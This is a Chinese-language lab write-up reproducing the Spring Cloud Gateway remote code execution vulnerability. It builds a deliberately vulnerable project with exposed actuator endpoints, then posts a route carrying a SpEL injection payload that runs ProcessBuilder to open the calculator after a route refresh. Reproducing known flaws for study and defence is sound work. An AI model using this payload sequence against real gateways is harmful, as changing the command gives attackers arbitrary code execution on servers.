Spring Cloud Gateway远程代码执行漏洞复现
我们先来了解一下Spring Cloud GateWay是什么? Spring Cloud Gateway 是提供了一个用于在 Spring Webflux 之上构建API网关的库。Spring Cloud Gateway 旨在提供一种简单而有效的方式来路由到API并为它们提供交叉关注点,例如:安全、监控和弹性。
Spring Cloud Gateway特性:
基于Spring Framework 5、Project Reactor和Spring Boot 2.0。 能够匹配任何请求属性的路由。 特定于路由的断言和过滤器。 集成Circuit Breaker。 集成Spring Cloud DiscoveryClient。 断言和过滤器易于编写。 请求速率限制。 路径重写。
漏洞环境搭建
本次测试采用版本即为官方爆出的漏洞覆盖版本,除此之外还需 PostMan 工具
- Spring Boot 2.5.2
- Spring Cloud 2020.0.3
- 其中Spring Cloud Gateway 为 3.0.3(漏洞版本) 我们在idea中创建一个maven项目,我的是gateWay-poc,下面是pom.xml文件
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.5.2</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com.example</groupId>
<artifactId>gateway-poc</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>gateway-poc</name>
<description>gateway-poc</description>
<properties>
<java.version>1.8</java.version>
<spring-cloud.version>2020.0.5</spring-cloud.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-starter-gateway</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
</dependencies>
<dependencyManagement>
<dependencies>
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-dependencies</artifactId>
<version>2020.0.3</version>
<type>pom</type>
<scope>import</scope>
</dependency>
</dependencies>
</dependencyManagement>
<build>
<finalName>gateway</finalName>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-compiler-plugin</artifactId>
<configuration>
<source>1.8</source>
<target>1.8</target>
</configuration>
</plugin>
</plugins>
</build>
</project>
然后创建application.yml
server:
port: 8080
management:
endpoints:
web:
exposure:
include: gateway
endpoint:
gateway:
enabled: true
spring:
cloud:
gateway:
routes:
- id: baidu
uri: 'https://www.baidu.com/'
order: 8000
predicates:
- Path=/skip/baidu
filters:
- StripPrefix=2
编写启动类 GatewayPocApplication
package com.example.gatewaypoc;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class GatewayPocApplication {
public static void main(String[] args) {
SpringApplication.run(GatewayPocApplication.class, args);
}
}
启动maven项目
下面是漏洞复现过程
1、查看当前路由:
GET http://localhost:8080/actuator/gateway/routes
2、添加包含恶意代码注入的路由:
POST http://localhost:8080/actuator/gateway/routes/test\ Content-Type: application/json
请求体Body内容:
"id": "test",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new java.lang.ProcessBuilder(\"calc\").start()}"
}
}],
"uri": "https://www.baidu.com"
}
3、刷新网关路由
POST http://localhost:8080/actuator/gateway/refresh
postman发送以上请求,随即打开本地计算器程序,注入代码执行成功
